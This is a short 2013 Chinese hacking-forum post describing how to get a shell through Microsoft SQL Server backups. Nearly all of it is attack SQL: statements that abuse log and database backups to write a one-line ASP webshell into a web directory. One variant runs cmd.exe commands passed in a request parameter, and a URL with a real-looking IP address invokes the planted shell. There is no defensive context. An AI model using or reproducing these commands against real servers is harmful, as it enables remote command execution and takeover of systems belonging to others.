找回密码
 立即注册
欢迎中测联盟老会员回家,1997年注册的域名
查看: 2429|回复: 0
打印 上一主题 下一主题

mssql 备份获取shell

[复制链接]
跳转到指定楼层
楼主
发表于 2013-2-27 21:41:00 | 只看该作者 回帖奖励 |倒序浏览 |阅读模式

alter database whoamidataname set RECOVERY FULL
create table cmd (a image)
backup log whoamidataname to disk = ’c:\whoami’ with init
insert into cmd (a) value* (‘一句话木马’)
backup log whoamidataname to disk = ’whoami.asp’
drop table cmd
# use model   
# create table cmd (str image);   
# insert into cmd(str) values ('<%=server.createobject("wscript.shell").exec("cmd.exe /c "&request("c")).stdout.readall%>');   
# backup database model to disk='g:\wwwtest\l.asp';
http://202.119.9.42/l.asp?c=dir
回复

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

快速回复 返回顶部 返回列表